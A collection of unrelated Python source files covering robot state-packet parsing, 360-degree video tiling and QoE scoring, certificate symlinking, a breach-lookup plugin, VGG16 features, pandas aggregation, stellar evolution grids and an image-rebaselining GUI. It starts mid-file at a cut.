all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
#i_control: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_control = copy.deepcopy(all_values)
#tool_vector_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector_actual = copy.deepcopy(all_values)
#tcp_speed_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed_actual = copy.deepcopy(all_values)
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector_target = copy.deepcopy(all_values)
#tcp_speed_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed_target = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#robot_mode: 1x double (1x 8byte)
rs.robot_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#joint_modes: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.joint_modes = copy.deepcopy(all_values)
#safety_mode: 1x double (1x 8byte)
rs.safety_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#unused: 6x double (6x 8byte)
offset+=48
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 6x double (6x 8byte)
offset+=48
#speed_scaling: 1x double (1x 8byte)
rs.speed_scaling = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#linear_momentum_norm: 1x double (1x 8byte)
rs.linear_momentum_norm = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#unused: 2x double (2x 8byte)
offset+=16
#v_main: 1x double (1x 8byte)
rs.v_main = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#v_robot: 1x double (1x 8byte)
rs.v_robot = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#i_robot: 1x double (1x 8byte)
rs.i_robot = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#v_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.v_actual = copy.deepcopy(all_values)
return rs
|
30046
|
import numpy as np
import math
import pickle
def get_data(data, frame_nos, dataset, topic, usernum, fps, milisec, width, height, view_width, view_height):
"""
Read and return the viewport data
"""
VIEW_PATH = '../../Viewport/'
view_info = pickle.load(open(VIEW_PATH + 'ds{}/viewport_ds{}_topic{}_user{}'.format(dataset, dataset, topic, usernum), 'rb'), encoding='latin1')
if dataset == 1:
max_frame = int(view_info[-1][0]*1.0*fps/milisec)
for i in range(len(view_info)-1):
frame = int(view_info[i][0]*1.0*fps/milisec)
frame += int(offset*1.0*fps/milisec)
frame_nos.append(frame)
if(frame > max_frame):
break
X={}
X['VIEWPORT_x']=int(view_info[i][1][1]*width/view_width)
X['VIEWPORT_y']=int(view_info[i][1][0]*height/view_height)
data.append((X, int(view_info[i+1][1][1]*width/view_width),int(view_info[i+1][1][0]*height/view_height)))
elif dataset == 2:
for k in range(len(view_info)-1):
if view_info[k][0]<=offset+60 and view_info[k+1][0]>offset+60:
max_frame = int(view_info[k][0]*1.0*fps/milisec)
break
for k in range(len(view_info)-1):
if view_info[k][0]<=offset and view_info[k+1][0]>offset:
min_index = k+1
break
prev_frame = 0
for i in range(min_index,len(view_info)-1):
frame = int((view_info[i][0])*1.0*fps/milisec)
if frame == prev_frame:
continue
if(frame > max_frame):
break
frame_nos.append(frame)
X={}
X['VIEWPORT_x']=int(view_info[i][1][1]*width/view_width)
X['VIEWPORT_y']=int(view_info[i][1][0]*height/view_height)
data.append((X, int(view_info[i+1][1][1]*width/view_width),int(view_info[i+1][1][0]*height/view_height)))
prev_frame = frame
return data, frame_nos, max_frame
def tiling(data, frame_nos, max_frame, width, height, nrow_tiles, ncol_tiles, fps, pred_nframe):
"""
Calculate the tiles corresponding to the viewport and segment them into different chunks
"""
count=0
i=0
act_tiles = []
chunk_frames = []
# Leaving the first 5 seconds ( to keep consistent with our model)
while True:
curr_frame = frame_nos[i]
if curr_frame<5*fps:
i=i+1
[inp_i,x,y]=data[curr_frame]
else:
break
# Calulate the tiles and store it in chunks
while True:
curr_frame = frame_nos[i]
nframe = min(pred_nframe, max_frame - frame_nos[i])
if(nframe <= 0):
break
# Add the frames that will be in the current chunk
frames = {i}
for k in range(i+1, len(frame_nos)):
if(frame_nos[k] < curr_frame + nframe):
frames.add(k)
else:
i=k
break
if(i!=k):
i=k
if(i==(len(frame_nos)-1)):
break
frames = sorted(frames)
chunk_frames.append(frames)
# Get the actual tile
for k in range(len(frames)):
[inp_k, x_act, y_act] = data[frames[k]]
# print(x_act, y_act)
actual_tile_col = int(x_act * ncol_tiles / width)
actual_tile_row = int(y_act * nrow_tiles / height)
# print(actual_tile_col, actual_tile_row)
actual_tile_row = actual_tile_row-nrow_tiles if(actual_tile_row >= nrow_tiles) else actual_tile_row
actual_tile_col = actual_tile_col-ncol_tiles if(actual_tile_col >= ncol_tiles) else actual_tile_col
actual_tile_row = actual_tile_row+nrow_tiles if actual_tile_row < 0 else actual_tile_row
actual_tile_col = actual_tile_col+ncol_tiles if actual_tile_col < 0 else actual_tile_col
# print(actual_tile_col, actual_tile_row)
# print()
act_tiles.append((actual_tile_row, actual_tile_col))
return act_tiles, chunk_frames
def alloc_bitrate(frame_nos, chunk_frames, pref_bitrate, nrow_tiles, ncol_tiles):
"""
Allocates equal bitrate to all the tiles
"""
vid_bitrate = []
for i in range(len(chunk_frames)):
chunk = chunk_frames[i]
chunk_bitrate = [[-1 for x in range(ncol_tiles)] for y in range(nrow_tiles)]
chunk_weight = [[1. for x in range(ncol_tiles)] for y in range(nrow_tiles)]
total_weight = sum(sum(x) for x in chunk_weight)
for x in range(nrow_tiles):
for y in range(ncol_tiles):
chunk_bitrate[x][y] = chunk_weight[x][y]*pref_bitrate/total_weight;
vid_bitrate.append(chunk_bitrate)
return vid_bitrate
def calc_qoe(vid_bitrate, act_tiles, frame_nos, chunk_frames, width, height, nrow_tiles, ncol_tiles, player_width, player_height):
"""
Calculate QoE based on the video bitrates
"""
qoe = 0
prev_qoe_1 = 0
weight_1 = 1
weight_2 = 1
weight_3 = 1
tile_width = width/ncol_tiles
tile_height = height/nrow_tiles
for i in range(len(chunk_frames[:55])):
qoe_1, qoe_2, qoe_3, qoe_4 = 0, 0, 0, 0
tile_count = 0
rows, cols = set(), set()
rate = []
chunk = chunk_frames[i]
chunk_bitrate = vid_bitrate[i]
chunk_act = act_tiles[chunk[0]-chunk_frames[0][0] : chunk[-1]-chunk_frames[0][0]]
for j in range(len(chunk_act)):
if(chunk_act[j][0] not in rows or chunk_act[j][1] not in cols):
tile_count += 1
rows.add(chunk_act[j][0])
cols.add(chunk_act[j][1])
row, col = chunk_act[j][0], chunk_act[j][1]
# Find the number of tiles that can be accomodated from the center of the viewport
n_tiles_width = math.ceil((player_width/2 - tile_width/2)/tile_width)
n_tiles_height = math.ceil((player_height/2 - tile_height/2)/tile_height)
tot_tiles = (2 * n_tiles_width+1) * (2 * n_tiles_height+1)
local_qoe = 0
local_rate = [] # a new metric to get the standard deviation of bitrate within the player view (qoe2)
for x in range(2*n_tiles_height+1):
for y in range(2*n_tiles_width+1):
sub_row = row - n_tiles_height + x
sub_col = col - n_tiles_width + y
sub_row = nrow_tiles+row+sub_row if sub_row < 0 else sub_row
sub_col = ncol_tiles+col+sub_col if sub_col < 0 else sub_col
sub_row = sub_row-nrow_tiles if sub_row >= nrow_tiles else sub_row
sub_col = sub_col-ncol_tiles if sub_col >= ncol_tiles else sub_col
local_qoe += chunk_bitrate[sub_row][sub_col]
local_rate.append(chunk_bitrate[sub_row][sub_col])
qoe_1 += local_qoe / tot_tiles
if(len(local_rate)>0):
qoe_2 += np.std(local_rate)
rate.append(local_qoe / tot_tiles)
tile_count = 1 if tile_count==0 else tile_count
qoe_1 /= tile_count
qoe_2 /= tile_count
if(len(rate)>0):
qoe_3 = np.std(rate)
qoe_3 /= tile_count
if(i>0):
qoe_4 = abs(prev_qoe_1 - qoe_1)
qoe += qoe_1 - weight_1*qoe_2 - weight_2*qoe_3 - weight_3*qoe_4
prev_qoe_1 = qoe_1
return qoe
|
30081
|
import os
import os.path
import subprocess
import sys
if __name__ == "__main__":
dirname = sys.argv[1]
for x in os.listdir(dirname):
if x.endswith('.crt'):
try:
filename = os.path.join(dirname, x)
filehash = subprocess.check_output(['openssl', 'x509', '-noout', '-hash', '-in', filename]).strip()
filehash += '.0'
hash_filename = os.path.join(dirname, filehash)
if os.path.exists(hash_filename):
print(x, filehash)
os.remove(hash_filename)
os.symlink(x, hash_filename)
except:
print("error in handling file:", filename)
|
30134
|
import time
import requests
from core.utils.parser import Parser
from core.utils.helpers import Helpers
from core.models.plugin import BasePlugin
class HIBP(BasePlugin):
def __init__(self, args):
self.args = args
self.base_url = "https://haveibeenpwned.com/api/v2/breachedaccount"
self.url_parameters = "truncateResponse=true&includeUnverified=true"
def execute(self, data):
Helpers.print_warning("Starting Have I Been Pwned plugin...", jumpline=True)
all_emails = Parser(self.args).all_unique_emails(data)
if all_emails:
self.check_all_emails(all_emails)
return True
return False
def check_authors(self, authors):
for author in authors:
time.sleep(2)
self.check_email(author.email)
def check_all_emails(self, emails):
for email in emails:
time.sleep(2)
self.check_email(email)
def check_email(self, email):
try:
url = "{}/{}?{}".format(self.base_url, email, self.url_parameters)
r = requests.get(url)
if r.status_code == 503:
Helpers.print_error("hibp: IP got in DDoS protection by CloudFare")
elif r.status_code == 429:
Helpers.print_error("hibp: Throttled by HIBP API")
elif r.text:
r = r.json()
print("\n{} leaks:".format(email))
for leak in r:
print("\t- {}".format(leak["Name"]))
return True
return False
except Exception as e:
Helpers.print_error(e)
return False
|
30189
|
import tensorflow as tf
from tensorflow.keras.applications.vgg16 import VGG16
from tensorflow.keras import models
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.vgg16 import preprocess_input
import numpy as np
import cv2
# prebuild model with pre-trained weights on imagenet
base_model = VGG16(weights='imagenet', include_top=True)
print (base_model)
for i, layer in enumerate(base_model.layers):
print (i, layer.name, layer.output_shape)
# extract features from block4_pool block
model = models.Model(inputs=base_model.input,
outputs=base_model.get_layer('block4_pool').output)
img_path = 'cat.jpg'
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
# get the features from this block
features = model.predict(x)
print(features)
|
30194
|
import pandas as pd
import numpy as np
print(pd.__version__)
# 1.0.0
print(pd.DataFrame.agg is pd.DataFrame.aggregate)
# True
df = pd.DataFrame({'A': [0, 1, 2], 'B': [3, 4, 5]})
print(df)
# A B
# 0 0 3
# 1 1 4
# 2 2 5
print(df.agg(['sum', 'mean', 'min', 'max']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
# min 0.0 3.0
# max 2.0 5.0
print(type(df.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg(['sum']))
# A B
# sum 3 12
print(type(df.agg(['sum'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg('sum'))
# A 3
# B 12
# dtype: int64
print(type(df.agg('sum')))
# <class 'pandas.core.series.Series'>
print(df.agg({'A': ['sum', 'min', 'max'],
'B': ['mean', 'min', 'max']}))
# A B
# max 2.0 5.0
# mean NaN 4.0
# min 0.0 3.0
# sum 3.0 NaN
print(df.agg({'A': 'sum', 'B': 'mean'}))
# A 3.0
# B 4.0
# dtype: float64
print(df.agg({'A': ['sum'], 'B': ['mean']}))
# A B
# mean NaN 4.0
# sum 3.0 NaN
print(df.agg({'A': ['min', 'max'], 'B': 'mean'}))
# A B
# max 2.0 NaN
# mean NaN 4.0
# min 0.0 NaN
print(df.agg(['sum', 'mean', 'min', 'max'], axis=1))
# sum mean min max
# 0 3.0 1.5 0.0 3.0
# 1 5.0 2.5 1.0 4.0
# 2 7.0 3.5 2.0 5.0
s = df['A']
print(s)
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(s.agg(['sum', 'mean', 'min', 'max']))
# sum 3.0
# mean 1.0
# min 0.0
# max 2.0
# Name: A, dtype: float64
print(type(s.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.series.Series'>
print(s.agg(['sum']))
# sum 3
# Name: A, dtype: int64
print(type(s.agg(['sum'])))
# <class 'pandas.core.series.Series'>
print(s.agg('sum'))
# 3
print(type(s.agg('sum')))
# <class 'numpy.int64'>
print(s.agg({'Total': 'sum', 'Average': 'mean', 'Min': 'min', 'Max': 'max'}))
# Total 3.0
# Average 1.0
# Min 0.0
# Max 2.0
# Name: A, dtype: float64
# print(s.agg({'NewLabel_1': ['sum', 'max'], 'NewLabel_2': ['mean', 'min']}))
# SpecificationError: nested renamer is not supported
print(df.agg(['mad', 'amax', 'dtype']))
# A B
# mad 0.666667 0.666667
# amax 2 5
# dtype int64 int64
print(df['A'].mad())
# 0.6666666666666666
print(np.amax(df['A']))
# 2
print(df['A'].dtype)
# int64
# print(df.agg(['xxx']))
# AttributeError: 'xxx' is not a valid function for 'Series' object
# print(df.agg('xxx'))
# AttributeError: 'xxx' is not a valid function for 'DataFrame' object
print(hasattr(pd.DataFrame, '__array__'))
# True
print(hasattr(pd.core.groupby.GroupBy, '__array__'))
# False
print(df.agg([np.sum, max]))
# A B
# sum 3 12
# max 2 5
print(np.sum(df['A']))
# 3
print(max(df['A']))
# 2
print(np.abs(df['A']))
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(df.agg([np.abs]))
# A B
# absolute absolute
# 0 0 3
# 1 1 4
# 2 2 5
# print(df.agg([np.abs, max]))
# ValueError: cannot combine transform and aggregation operations
def my_func(x):
return min(x) / max(x)
print(df.agg([my_func, lambda x: min(x) / max(x)]))
# A B
# my_func 0.0 0.6
# <lambda> 0.0 0.6
print(df['A'].std())
# 1.0
print(df['A'].std(ddof=0))
# 0.816496580927726
print(df.agg(['std', lambda x: x.std(ddof=0)]))
# A B
# std 1.000000 1.000000
# <lambda> 0.816497 0.816497
print(df.agg('std', ddof=0))
# A 0.816497
# B 0.816497
# dtype: float64
print(df.agg(['std'], ddof=0))
# A B
# std 1.0 1.0
df_str = df.assign(C=['X', 'Y', 'Z'])
print(df_str)
# A B C
# 0 0 3 X
# 1 1 4 Y
# 2 2 5 Z
# df_str['C'].mean()
# TypeError: Could not convert XYZ to numeric
print(df_str.agg(['sum', 'mean']))
# A B C
# sum 3.0 12.0 XYZ
# mean 1.0 4.0 NaN
print(df_str.agg(['mean', 'std']))
# A B
# mean 1.0 4.0
# std 1.0 1.0
print(df_str.agg(['sum', 'min', 'max']))
# A B C
# sum 3 12 XYZ
# min 0 3 X
# max 2 5 Z
print(df_str.select_dtypes(include='number').agg(['sum', 'mean']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
|
30209
|
import os
import re
import pickle
import numpy as np
import pandas as pd
from tqdm import tqdm
# Assign labels used in eep conversion
eep_params = dict(
age = 'Age (yrs)',
hydrogen_lum = 'L_H',
lum = 'Log L',
logg = 'Log g',
log_teff = 'Log T',
core_hydrogen_frac = 'X_core', # must be added
core_helium_frac = 'Y_core',
teff_scale = 20, # used in metric function
lum_scale = 1, # used in metric function
# `intervals` is a list containing the number of secondary Equivalent
# Evolutionary Phases (EEPs) between each pair of primary EEPs.
intervals = [200, # Between PreMS and ZAMS
50, # Between ZAMS and EAMS
100, # Between EAMS and IAMS
100, # IAMS-TAMS
150], # TAMS-RGBump
)
def my_PreMS(track, eep_params, i0=None):
'''
Dartmouth models do not have central temperature, which is necessary for
the default PreMS calculation. For now, let the first point be the PreMS.
'''
return 0
def my_TAMS(track, eep_params, i0, Xmin=1e-5):
'''
By default, the TAMS is defined as the first point in the track where Xcen
drops below 10^-12. But not all the DSEP tracks hit this value. To ensure
the TAMS is placed correctly, here I'm using Xcen = 10^-5 as the critical
value.
'''
core_hydrogen_frac = eep_params['core_hydrogen_frac']
Xc_tr = track.loc[i0:, core_hydrogen_frac]
below_crit = Xc_tr <= Xmin
if not below_crit.any():
return -1
return below_crit.idxmax()
def my_RGBump(track, eep_params, i0=None):
'''
Modified from eep.get_RGBump to make luminosity logarithmic
'''
lum = eep_params['lum']
log_teff = eep_params['log_teff']
N = len(track)
lum_tr = track.loc[i0:, lum]
logT_tr = track.loc[i0:, log_teff]
lum_greater = (lum_tr > 1)
if not lum_greater.any():
return -1
RGBump = lum_greater.idxmax() + 1
while logT_tr[RGBump] < logT_tr[RGBump-1] and RGBump < N-1:
RGBump += 1
# Two cases: 1) We didn't reach an extremum, in which case RGBump gets
# set as the final index of the track. In this case, return -1.
# 2) We found the extremum, in which case RGBump gets set
# as the index corresponding to the extremum.
if RGBump >= N-1:
return -1
return RGBump-1
def my_HRD(track, eep_params):
'''
Adapted from eep._HRD_distance to fix lum logarithm
'''
# Allow for scaling to make changes in Teff and L comparable
Tscale = eep_params['teff_scale']
Lscale = eep_params['lum_scale']
log_teff = eep_params['log_teff']
lum = eep_params['lum']
logTeff = track[log_teff]
logLum = track[lum]
N = len(track)
dist = np.zeros(N)
for i in range(1, N):
temp_dist = (((logTeff.iloc[i] - logTeff.iloc[i-1])*Tscale)**2
+ ((logLum.iloc[i] - logLum.iloc[i-1])*Lscale)**2)
dist[i] = dist[i-1] + np.sqrt(temp_dist)
return dist
def from_dartmouth(path):
fname = path.split('/')[-1]
file_str = fname.replace('.trk', '')
mass = int(file_str[1:4])/100
met_str = file_str[7:10]
met = int(met_str[1:])/10
if met_str[0] == 'm':
met *= -1
alpha_str = file_str[13:]
alpha = int(alpha_str[1:])/10
if alpha_str[0] == 'm':
alpha *= -1
with open(path, 'r') as f:
header = f.readline()
col_line = f.readline()
data_lines = f.readlines()
columns = re.split(r'\s{2,}', col_line.strip('# \n'))
data = np.genfromtxt(data_lines)
# Build multi-indexed DataFrame, dropping unwanted columns
multi_index = pd.MultiIndex.from_tuples(
[(mass, met, step) for step in range(len(data))],
names=['initial_mass', 'initial_met', 'step'])
df = pd.DataFrame(data, index=multi_index, columns=columns)
return df
def all_from_dartmouth(raw_grids_path, progress=True):
df_list = []
filelist = [f for f in os.listdir(raw_grids_path) if '.trk' in f]
if progress:
file_iter = tqdm(filelist)
else:
file_iter = filelist
for fname in file_iter:
fpath = os.path.join(raw_grids_path, fname)
df_list.append(from_dartmouth(fpath))
dfs = pd.concat(df_list).sort_index()
# Need X_core for EEP computation
dfs['X_core'] = 1 - dfs['Y_core'] - dfs['Z_core']
return dfs
def install(
raw_grids_path,
name=None,
eep_params=eep_params,
eep_functions={'prems': my_PreMS, 'tams': my_TAMS, 'rgbump': my_RGBump},
metric_function=my_HRD,
):
'''
The main method to install grids that are output of the `rotevol` rotational
evolution tracer code.
Parameters
----------
raw_grids_path (str): the path to the folder containing the raw model grids.
name (str, optional): the name of the grid you're installing. By default,
the basename of the `raw_grids_path` will be used.
eep_params (dict, optional): contains a mapping from your grid's specific
column names to the names used by kiauhoku's default EEP functions.
It also contains 'eep_intervals', the number of secondary EEPs
between each consecutive pair of primary EEPs. By default, the params
defined at the top of this script will be used, but users may specify
their own.
eep_functions (dict, optional): if the default EEP functions won't do the
job, you can specify your own and supply them in a dictionary.
EEP functions must have the call signature
function(track, eep_params), where `track` is a single track.
If none are supplied, the default functions will be used.
metric_function (callable, None): the metric function is how the EEP
interpolator spaces the secondary EEPs. By default, the path
length along the evolution track on the H-R diagram (luminosity vs.
Teff) is used, but you can specify your own if desired.
metric_function must have the call signature
function(track, eep_params), where `track` is a single track.
If no function is supplied, defaults to dartmouth.my_HRD.
Returns None
'''
from .stargrid import from_pandas
from .stargrid import grids_path as install_path
if name is None:
name = os.path.basename(raw_grids_path)
# Create cache directories
path = os.path.join(install_path, name)
if not os.path.exists(path):
os.makedirs(path)
# Cache eep parameters
with open(os.path.join(path, 'eep_params.pkl'), 'wb') as f:
pickle.dump(eep_params, f)
print('Reading and combining grid files')
grids = all_from_dartmouth(raw_grids_path)
grids = from_pandas(grids, name=name)
# Save full grid to file
full_save_path = os.path.join(path, 'full_grid.pqt')
print(f'Saving to {full_save_path}')
grids.to_parquet(full_save_path)
print(f'Converting to eep-based tracks')
eeps = grids.to_eep(eep_params, eep_functions, metric_function)
# Save EEP grid to file
eep_save_path = os.path.join(path, 'eep_grid.pqt')
print(f'Saving to {eep_save_path}')
eeps.to_parquet(eep_save_path)
# Create and save interpolator to file
interp = eeps.to_interpolator()
interp_save_path = os.path.join(path, 'interpolator.pkl')
print(f'Saving interpolator to {interp_save_path}')
interp.to_pickle(path=interp_save_path)
print(f'Model grid "{name}" installed.')
|
30226
|
from enum import Enum
class TradeStatus(Enum):
PENDING_ACCEPT = 0
PENDING_CONFIRM = 1
PENDING_CANCEL = 2
CANCELED = 3
CONFIRMED = 4
FAILED = 5
|
30238
|
import filecmp
import os
import sys
import shutil
import subprocess
import time
import unittest
if (sys.version_info > (3, 0)):
import urllib.request, urllib.parse, urllib.error
else:
import urllib
from optparse import OptionParser
from PyQt4 import QtCore,QtGui
parser = OptionParser()
parser.add_option("-r", "--root", dest="web_root",
default="http://portal.nersc.gov/project/visit/",
help="Root of web URL where baselines are")
parser.add_option("-d", "--date", dest="web_date",
help="Date of last good run, in YYMonDD form")
parser.add_option("-m", "--mode", dest="mode",
help="Mode to run in: serial, parallel, sr")
parser.add_option("-w", "--web-url", dest="web_url",
help="Manual URL specification; normally generated "
"automatically based on (-r, -d, -m)")
parser.add_option("-g", "--git", dest="git", action="store_true",
help="Use git to ignore images with local modifications")
parser.add_option("-s", "--svn", dest="svn", action="store_true",
help="Use svn to ignore images with local modifications")
(options, args) = parser.parse_args()
if options.web_url is not None:
uri = options.web_url
else:
uri = options.web_root + options.web_date + "/"
mode = ""
if options.mode == "sr" or options.mode == "scalable,parallel" or \
options.mode == "scalable_parallel":
mode="davinci_scalable_parallel_icet"
else:
mode="".join([ s for s in ("davinci_", options.mode) ])
uri += mode + "/"
parser.destroy()
print("uri:", uri)
class MW(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
def real_dirname(path):
"""Python's os.path.dirname is not dirname."""
return path.rsplit('/', 1)[0]
def real_basename(path):
"""Python's os.path.basename is not basename."""
if path.rsplit('/', 1)[1] is '': return None
return path.rsplit('/', 1)[1]
def baseline_current(serial_baseline):
"""Given the path to the serial baseline image, determine if there is a mode
specific baseline. Return a 2-tuple of the baseline image and the path to
the 'current' image."""
dname = real_dirname(serial_baseline)
bname = real_basename(serial_baseline)
baseline = serial_baseline
if options.mode is not None:
# Check for a mode specific baseline.
mode_spec = os.path.join(dname + "/", options.mode + "/", bname)
if os.path.exists(mode_spec):
baseline = mode_spec
# `Current' image never has a mode-specific path; filename/dir is always
# based on the serial baseline's directory.
no_baseline = serial_baseline.split('/', 1) # path without "baseline/"
current = os.path.join("current/", no_baseline[1])
return (baseline, current)
def mode_specific(baseline):
"""Given a baseline image path, return a path to the mode specific baseline,
even if said baseline does not exist (yet)."""
if options.mode is None or options.mode == "serial":
return baseline
dname = real_dirname(baseline)
bname = real_basename(baseline)
if options.mode == "parallel":
if baseline.find("/parallel") != -1:
# It's already got parallel in the path; this IS a mode specific
# baseline.
return baseline
return os.path.join(dname, options.mode, bname)
if options.mode.find("scalable") != -1:
if baseline.find("scalable_parallel") != -1:
# Already is mode-specific.
return baseline
return os.path.join(dname, "scalable_parallel", bname)
# Ruh roh. options.mode must be garbage.
raise NotImplementedError("Unknown mode '%s'" % options.mode)
def local_modifications_git(file):
vcs_diff = subprocess.call(["git", "diff", "--quiet", file])
if vcs_diff == 1:
return True
return False
def local_modifications_svn(file):
svnstat = subprocess.Popen("svn stat %s" % file, shell=True,
stdout=subprocess.PIPE)
diff = svnstat.communicate()[0]
if diff != '':
return True
return False
def local_modifications(filepath):
"""Returns true if the file has local modifications. Always false if the
user did not supply the appropriate VCS option."""
if options.git: return local_modifications_git(filepath)
if options.svn: return local_modifications_svn(filepath)
return False
def equivalent(baseline, image):
"""True if the files are the same."""
if not os.path.exists(image): return False
# Note this is `shallow' by default, but that's fine for our usage.
return filecmp.cmp(baseline, image)
def trivial_pass(baseline, image):
"""True if we can determine that this image is OK without querying the
network."""
return equivalent(baseline, image) or local_modifications(baseline)
class RebaselinePTests(unittest.TestCase):
def test_dirname(self):
input_and_results = [
("baseline/category/test/a.png", "baseline/category/test"),
("b/c/t/q.png", "b/c/t"),
("b/c/t/longfn.png", "b/c/t"),
("b/c/t/", "b/c/t")
]
for tst in input_and_results:
self.assertEqual(real_dirname(tst[0]), tst[1])
def test_basename(self):
input_and_results = [
("baseline/category/test/a.png", "a.png"),
("b/c/t/q.png", "q.png"),
("b/c/t/longfn.png", "longfn.png"),
("b/c/t/", None)
]
for tst in input_and_results:
self.assertEqual(real_basename(tst[0]), tst[1])
class Image(QtGui.QWidget):
def __init__(self, path, parent=None):
self._filename = path
self._parent = parent
self._display = QtGui.QLabel(self._parent)
self._load()
def _load(self):
pixmap = QtGui.QPixmap(300,300)
pixmap.load(self._filename)
self._display.resize(pixmap.size())
self._display.setPixmap(pixmap)
def widget(self): return self._display
def width(self): return self._display.width()
def height(self): return self._display.height()
def update(self, path):
self._filename = path
self._load()
class Layout(QtGui.QWidget):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self._mainwin = parent
self._mainwin.statusBar().insertPermanentWidget(0,QtGui.QLabel())
self.status("Initializing...")
quit = QtGui.QPushButton('Quit', self)
quit.setMaximumWidth(80)
if parent is None: parent = self
parent.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp,
QtCore.SLOT('quit()'))
parent.connect(self, QtCore.SIGNAL('closeApp()'), self._die)
self._init_signals()
self._bugs = [] # list which keeps track of which images we think are bugs.
# guess an initial size; we don't know a real size until we've downloaded
# images.
self.resize_this_and_mainwin(600, 600)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
self.setFocus()
self._baseline = None
self._current = None
self._diff = None
self._images = [None, None, None]
self._next_set_of_images()
self._images[0] = Image(self._baseline, self)
self._images[1] = Image(self._current, self)
self._images[2] = Image(self._diff, self)
grid = QtGui.QGridLayout()
label_baseline = QtGui.QLabel(grid.widget())
label_current = QtGui.QLabel(grid.widget())
label_diff = QtGui.QLabel(grid.widget())
label_baseline.setText("Baseline image:")
label_current.setText("Davinci's current:")
label_diff.setText("difference between them:")
label_baseline.setMaximumSize(QtCore.QSize(160,35))
label_current.setMaximumSize(QtCore.QSize(160,35))
label_diff.setMaximumSize(QtCore.QSize(200,35))
label_directions = QtGui.QLabel(grid.widget())
label_directions.setText("Keyboard shorcuts:\n\n"
"y: yes, rebaseline\n"
"n: no, current image is wrong\n"
"u: unknown, I can't/don't want to decide now\n"
"q: quit")
label_directions.setMaximumSize(QtCore.QSize(300,300))
grid.addWidget(label_baseline, 0,0)
grid.addWidget(label_current, 0,1)
grid.addWidget(self._images[0].widget(), 1,0)
grid.addWidget(self._images[1].widget(), 1,1)
grid.addWidget(label_diff, 2,0)
grid.addWidget(quit, 2,1)
grid.addWidget(self._images[2].widget(), 3,0)
grid.addWidget(label_directions, 3,1)
rows = (
(0, (label_baseline, label_current)),
(1, (self._images[0], self._images[1])),
(2, (label_diff, quit)),
(3, (self._images[2], label_directions))
)
cols = (
(0, (label_baseline, self._images[0], label_diff, self._images[2])),
(1, (label_current, self._images[1], quit, label_directions))
)
for r in rows:
grid.setRowMinimumHeight(r[0], max([x.height() for x in r[1]]))
for c in cols:
grid.setColumnMinimumWidth(c[0], max([x.height() for x in c[1]]))
self.setLayout(grid)
self.resize_this_and_mainwin(self.calc_width(), self.calc_height())
self.show()
self.setFocus()
def resize_this_and_mainwin(self, w, h):
self.resize(w,h)
# make sure it can't shrink too much
self._mainwin.setMinimumWidth(w)
self._mainwin.setMinimumHeight(h+30) # +30: for the status bar
# try not to resize the mainwin if we don't need to; it's annoying.
cur_w = self._mainwin.width()
cur_h = self._mainwin.height()
self._mainwin.resize(max(w,cur_w), max(h,cur_h))
self._mainwin.update()
def _die(self):
print("You thought these test results were bugs:")
for f in self._bugs:
print("\t", f)
self._mainwin.close()
def calc_width(self):
w = 0
for col in range(0,self.layout().columnCount()):
w += self.layout().columnMinimumWidth(col)
return w
def calc_height(self):
h = 0
for row in range(0,self.layout().rowCount()):
h += self.layout().rowMinimumHeight(row)
return h
def _update_images(self):
self._images[0].update(self._baseline)
self._images[1].update(self._current)
self._images[2].update(self._diff)
self.resize_this_and_mainwin(self.calc_width(), self.calc_height())
self.update()
def _rebaseline(self):
self.status("".join(["rebaselining ", self._current, "..."]))
baseline = mode_specific(self._baseline)
print("moving", self._current, "on top of", baseline)
# We might be creating the first mode specific baseline for that test. If
# so, it'll be missing the baseline specific dir.
if not os.path.exists(real_dirname(baseline)):
print(real_dirname(baseline), "does not exist, creating...")
os.mkdir(real_dirname(baseline))
